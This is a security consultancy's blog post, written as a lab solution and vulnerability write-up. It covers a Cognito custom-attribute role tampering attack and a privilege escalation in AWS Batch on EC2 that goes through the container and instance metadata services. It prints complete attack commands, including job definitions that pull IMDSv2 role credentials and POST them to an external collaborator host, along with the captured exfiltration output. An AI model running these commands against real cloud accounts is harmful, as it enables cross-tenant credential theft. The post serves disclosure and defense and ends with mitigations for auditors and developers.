Messing Around With AWS Batch For Privilege Escalations

13 Jun 2023 - Posted by Francesco Lacerenza, Mohamed Ouad

From The Previous Episode… Have you solved the CloudSecTidbit Ep. 2 IaC lab?

Solution



The challenge for the AWS Cognito CloudSecTidbit is basically escalating the privileges to admin and reading the internal users list.

The application uses AWS Cognito to issue a session token saved as a cookie with the name aws-cognito-app-access-token.

The JWT is a valid AWS Cognito user token, usable to interact with the service. It is possible to retrieve the current user attributes with the command:

aws cognito-idp get-user --region us-east-1 --access-token <USER_ACCESS_TOKEN>

{
    "Username": "francesco",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "5139e6e7-7a37-4e6e-9304-8c32973e4ac0"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "francesco"
        },
        {
            "Name": "custom:Role",
            "Value": "user"
        },
        {
            "Name": "email",
            "Value": "dummy@doyensec.com"
        }
    ]
}

Then, because of the default READ/WRITE permissions on the user attributes, the attacker is able to tamper with the custom:Role attribute and set it to admin:

aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:Role,Value=admin" --access-token <USER_ACCESS_TOKEN>

After that, by refreshing the authenticated tab, the user is now recognized as an admin.

That happens because the vulnerable platform trusts the custom:Role attribute to evaluate the authorization level of the user.
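To confirm the effect of the tampering from the command line, the attribute can be read back after the update. The snippet below is a minimal sketch: the `cognito_role` function name is ours, the region default simply mirrors the commands above, and the `--query` expression is a JMESPath filter over the `get-user` output shown earlier.

```shell
# Print the current custom:Role value for the user owning the access token.
# $1: Cognito access token
# $2: AWS region (optional; defaults to us-east-1 as in the commands above)
cognito_role() {
  aws cognito-idp get-user \
    --region "${2:-us-east-1}" \
    --access-token "$1" \
    --query "UserAttributes[?Name=='custom:Role'].Value" \
    --output text
}

# Example (placeholder token):
#   cognito_role "<USER_ACCESS_TOKEN>"
```

Running it before and after `update-user-attributes` should show the value moving from `user` to `admin` in the lab scenario.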

Tidbit No. 3 - Messing around with AWS Batch For Privilege Escalations

Q: What is AWS Batch?

- A set of batch management capabilities that enable developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS.

- AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g. CPU or memory optimized compute resources) based on the volume and specific resource requirements of the batch jobs submitted.

- With AWS Batch, there is no need to install and manage batch computing software or server clusters, allowing you to instead focus on analyzing results and solving problems.

- AWS Batch plans, schedules, and executes your batch computing workloads using Amazon EC2 (available with Spot Instances) and AWS compute resources with AWS Fargate or Fargate Spot.



Summarizing the previous points, it is a fully managed and self-scaling scheduler for tasks.

Its main components are:

- Jobs. The unit of work. A job can be a shell script, an executable, or a container image submitted to AWS Batch.

- Job definitions. They are blueprints for the tasks. It is possible to grant them IAM roles to access AWS resources, set their memory and CPU requirements, and even control container properties like environment variables or mount points for persistent storage.

- Job queues. Submitted jobs are stacked in queues until they are scheduled onto a compute environment. Job queues can be associated with multiple compute environments and configured with different priority values.

- Compute environments. Sets of managed or unmanaged compute resources that are usable to run jobs. With managed compute environments, you can choose the desired compute type (Fargate, EC2 and EKS) and deeply configure its resources. AWS Batch launches, manages, and terminates compute types as needed. You can also manage your own compute environments, but you’re responsible for setting up and scaling the instances in an Amazon ECS cluster that AWS Batch creates for you.

The scheme below (taken from the AWS documentation) shows the workflow for the service.

After a first look at AWS Batch basics, we can introduce the core differences in the managed compute environment types.

Orchestration Types In Managed Compute Environments

Fargate

AWS Batch jobs can run on AWS Fargate resources. AWS Fargate uses Amazon ECS to run containers and orchestrates their lifecycle.

This configuration fits cases where it is not needed to have control over the host machine running the container task. All the logic is embedded in the task and there is no need to add context from the host machine.

EC2

AWS Batch jobs can run on Amazon EC2 instances. It allows particular instance configurations like:

- Settings for vCPUs, memory and/or GPU

- Custom Amazon Machine Image (AMI) with launch templates

- Custom environment parameters

This configuration fits scenarios where it is necessary to customize and control the containers’ host environment. As an example, you may need to mount an Elastic File System (EFS) and share some folders with the running jobs.

EKS

AWS Batch doesn’t create, administer, or perform lifecycle operations of the EKS clusters. AWS Batch orchestration scales up and down nodes managed by AWS Batch and runs pods on those nodes.

The logic conditions are similar to the ECS case.

Running Tasks With Two Metadata Services & Two Roles - The Unwanted Role Exposure Case



While testing a multi-tenant platform, we managed to leverage AWS Batch to compromise the cloud environment and perform privilege escalation.

The single tenants were using AWS Batch to execute some computational work given a certain input to be processed (tenant data).

The task jobs of all tenants were initialized and executed using the EC2 orchestration type; hence, all batch containers were running on the same task-runner EC2 instances.

The scheme below describes the observed scenario at a high-level.

The tenant data (input) was mounted on the EC2 spot instance prior to the execution with Elastic File System (EFS). As can be seen in the design scheme, the specific tenant input data was shared to batch job containers via precise shared folders.

This might seem like a secure and well-isolated environment, but it wasn’t.

In order to illustrate the final exploitation, a few IAM concepts about the vulnerable context must be explained:

- Within the described design, the compute environment EC2 Spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data.

- The task containers (batch jobs) had an execution role with the batch:RegisterJobDefinition and batch:SubmitJob permissions.

The Testing Phase

During testing, we naturally tried to execute code in the jobs to get access to internal AWS credentials. Since the Instance Metadata Service (IMDSv2) was network-restricted in the running containers, it was not possible to get an easy win by reaching 169.254.169.254 (the IMDS IP).

Nevertheless, containers running in ECS and EKS have the Container Metadata Service (CMDS) running and reachable at 169.254.170.2 (did you know?). It is literally the doppelganger of the IMDS service, but for containers and pods in AWS.



Thanks to it, we were able to gather information about the running task. By looking at the AWS documentation, you can learn more about the many environment variables exposed to the running container. Among them, there is AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

In fact, the CMDS protects users against SSRF interactions by serving credentials from a dynamic endpoint whose path is stored in an environment variable. As a result, basic SSRFs cannot guess the pseudo-random part of the path and retrieve the credentials.

The screenshot below shows an interaction with the CMDS to get the credentials from a running container (our execution context).

At this point, we had the credentials for the ecs-role owned by the running jobs.
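The CMDS interaction described above can be sketched in a few lines of shell. This is an illustration under assumptions, not the exact commands used during the engagement: the function names `cmds_credentials_url` and `fetch_task_credentials` are ours, and the only inputs taken from the text are the CMDS address (169.254.170.2) and the `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` environment variable.

```shell
# Build the credentials URL from the per-task relative path that the
# container agent injects into the container's environment.
cmds_credentials_url() {
  if [ -z "${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI:-}" ]; then
    echo "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is not set" >&2
    return 1
  fi
  printf 'http://169.254.170.2%s\n' "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
}

# Fetch the temporary credentials of the task/job role (JSON document).
# Must be run from inside the container.
fetch_task_credentials() {
  url=$(cmds_credentials_url) || return 1
  curl -s "$url"
}

# Example, from a shell inside the job container:
#   fetch_task_credentials
```

Because the relative path is only known inside the container, an attacker needs command execution (or a way to read environment variables) rather than a plain SSRF to reach this endpoint.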

Among the ECS-related execution permissions, it had RegisterJobDefinition, SubmitJob and DescribeJobQueues for the AWS Batch service.

Since the basic threat model assumed that users had command execution on the running containers, a certain level of control over the job definitions was not an issue.

Hence, having the RegisterJobDefinition and SubmitJob permissions exposed in the user-controlled context was not considered a vulnerability in the first place.

So, the next question was pretty obvious:

The Turning Point

After many hours of dorking and code review, we managed to discover two additional details:

- In the AWS Batch with EC2 compute environment, the jobs’ containers run with host network configuration. This means that Batch job containers use the host EC2 Spot instance’s networking directly

- The platform was restricting the IMDS connectivity on job containers when the worker was starting the tasks

Due to these conditions, a batch job could call the IMDSv2 service on behalf of the host EC2 Spot instance if it started without the restrictions applied by the worker, potentially leading to a privilege escalation:

- An attacker with the leaked batch job credentials could use RegisterJobDefinition and SubmitJob to define and execute a malicious AWS Batch job.

- The malicious job is able to communicate with the IMDS on behalf of the host EC2 Spot instance, since the network restrictions to the IMDS were not applied.

- In this way, it was possible to obtain credentials for the IAM role owned by the EC2 Spot instances.

As noted earlier, the compute environment EC2 Spot instances needed a role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data, which made these credentials a valuable target.

PrivEsc Exploitation

The exploitation phase required two job definitions to interact with the IMDSv2, one to get the instance IAM role name, and one to retrieve the IAM security credentials for the leaked role name.
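For readability, the two IMDSv2 lookups packed into the job commands can be written as a small shell sketch. The function names `imds_get` and `instance_role_credentials` are ours. The endpoints and headers are the standard IMDSv2 ones used in the job definitions, and the sketch assumes the instance profile exposes a single role name.

```shell
# Query an IMDSv2 metadata path: first obtain a session token with a PUT
# request, then send it along with the actual GET request.
# $1: path under /latest/meta-data/
imds_get() {
  imds_token=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") || return 1
  curl -s -H "X-aws-ec2-metadata-token: $imds_token" \
    "http://169.254.169.254/latest/meta-data/$1"
}

# Step 1: list the role name attached to the instance profile.
# Step 2: request the temporary credentials for that role.
instance_role_credentials() {
  role_name=$(imds_get "iam/security-credentials/") || return 1
  imds_get "iam/security-credentials/$role_name"
}

# Example, from a container that can reach the IMDS:
#   instance_role_credentials
```

In our case the two steps were split across two job definitions, since each job only exfiltrated its output to an external server.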

Job Definition 1 - Getting the host EC2 Spot instance role name

$ aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

After registering the job definition, submit a new job using the newly created job definition:

aws batch submit-job --job-name attacker-jb-getrolename --job-queue LowPriorityEc2 --job-definition poc-get-rolename --scheduling-priority-override 999 --share-identifier asd

Note: the job queue name was retrievable with aws batch describe-job-queues
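As a sketch of the enumeration step mentioned in the note, the queue names can be listed in a compact form. The `list_job_queues` function name and the selection of fields are ours; `jobQueueName`, `state` and `priority` are fields of the `describe-job-queues` response.

```shell
# List job queues visible to the current credentials as
# tab-separated rows: name, state, priority.
list_job_queues() {
  aws batch describe-job-queues \
    --query 'jobQueues[].[jobQueueName,state,priority]' \
    --output text
}

# Example, using the credentials leaked from the job container:
#   list_job_queues
```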

The attacker collaborator server received something like:

POST /exfil HTTP/1.1

Host: fo78ichlaqnfn01sju2ck6ixwo2fqaez.oastify.com

User-Agent: curl/8.0.1-DEV

Accept: */*

Content-Length: 44

Content-Type: application/x-www-form-urlencoded

iam-instance-role-20230322003148155300000001

Job Definition 2 - Getting the credentials for the host EC2 Spot instance role

$ aws batch register-job-definition --job-definition-name poc-get-aimcreds --type container --container-properties '{ "image": "curlimages/curl", "vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

As with the previous definition, once the job was submitted, the collaborator received the output.

POST /exfil HTTP/1.1

Host: 4otxi1haafn4np1hjj21kvimwd24qyen.oastify.com

User-Agent: curl/8.0.1-DEV

Accept: */*

Content-Length: 1430

Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::1235122316123:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}

This time it contained the AWS credentials for the host EC2 Spot instance role.

Privilege escalation achieved! The obtained role allowed us to access other tenants’ data and do much more.

Default Host Network Mode In AWS Batch With EC2 Orchestration

In AWS Batch with EC2 compute environments, the containers run with host network mode.

With such configuration, the containers (batch jobs) have access to both the EC2 IMDS and the CMDS.

The issue lies in the fact that the container job is able to communicate with the IMDSv2 service on behalf of the EC2 Spot instance because they share the same network interface.

In conclusion, it is very important to know about such behavior and avoid the possibility of introducing privilege escalation patterns while designing cloud environments.

For cloud security auditors

When the platform uses AWS Batch compute environments with EC2 orchestration, keep the following point in mind and answer the questions below:

- Always consider the security of the AWS Batch jobs and their possible compromise. A threat actor could escalate vertically/horizontally and gain more access to the cloud infrastructure.

- Which aspects of the job execution are controllable by the external user?

- Is command execution inside the jobs intended by the platform?

  - If yes, investigate the permissions available through the CMDS

  - If no, attempt to achieve command execution within the jobs’ context

- Is the IMDS restricted from the job execution context?

- Which types of Compute Environments are used in the platform?

  - Are there any Compute Environments configured with EC2 orchestration?

    - If yes, which role is assigned to EC2 Spot Instances?
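One way to answer the permission-related questions during an audit is the IAM policy simulator. The sketch below is only an illustration: the function names are ours, the role ARN is a placeholder supplied by the auditor, and the calling identity is assumed to be allowed to call `iam:SimulatePrincipalPolicy`. The simulation only covers what the simulator evaluates, so treat a clean result as a hint rather than proof.

```shell
# Simulate the two Batch actions abused in this write-up against a role.
# $1: ARN of the job/execution role under review (placeholder)
# Output: tab-separated rows of action name and decision
#         (allowed, implicitDeny or explicitDeny).
simulate_job_role() {
  aws iam simulate-principal-policy \
    --policy-source-arn "$1" \
    --action-names batch:RegisterJobDefinition batch:SubmitJob \
    --query 'EvaluationResults[].[EvalActionName,EvalDecision]' \
    --output text
}

# Print only the actions the role is allowed to perform.
# Returns non-zero when none of them is allowed.
risky_batch_actions() {
  simulate_job_role "$1" | grep 'allowed$'
}

# Example (placeholder ARN):
#   risky_batch_actions "arn:aws:iam::<ACCOUNT_ID>:role/<JOB_ROLE_NAME>"
```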

Note: The dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with EC2 launch type.

For developers

Developers should be aware of the fact that AWS Batch with EC2 compute environments will run containers with host network configuration. Consequently, the executed containers (batch jobs) have access to both the CMDS for the task role and the IMDS for the host EC2 Spot Instance role.

In order to prevent privilege escalation patterns, Job runs must match the following configurations:

- Having the IMDS restricted at network level in running jobs. Read the documentation here

- Restricting the batch job execution role and job role IAM permissions. In particular, avoid assigning RegisterJobDefinition and SubmitJob permissions in job-related or accessible policies to prevent uncontrolled execution by attackers landing on the job context

If you cannot apply both configurations in your design, consider changing the orchestration type.
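As an illustration of the second point, an explicit deny can be attached to the job role so that a compromised job cannot register or submit new jobs. This is a sketch under assumptions: the function names, the policy name `deny-batch-job-spawn` and the statement `Sid` are ours, and it presumes that the jobs themselves never need these two actions.

```shell
# Emit an IAM policy document that explicitly denies the two Batch
# actions abused in this write-up.
deny_job_spawn_policy() {
  cat <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyJobSpawnFromJobContext",
      "Effect": "Deny",
      "Action": ["batch:RegisterJobDefinition", "batch:SubmitJob"],
      "Resource": "*"
    }
  ]
}
EOF
}

# Attach the document as an inline policy on the given role.
# $1: name of the job role or execution role (placeholder)
attach_deny_policy() {
  aws iam put-role-policy \
    --role-name "$1" \
    --policy-name deny-batch-job-spawn \
    --policy-document "$(deny_job_spawn_policy)"
}

# Example (placeholder role name):
#   attach_deny_policy "<JOB_ROLE_NAME>"
```

An explicit deny takes precedence over any allow granted elsewhere to the same role, which makes it a reasonable safety net while the allow-side policies are being cleaned up.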

Note: Once again, the dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with the EC2 launch type.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!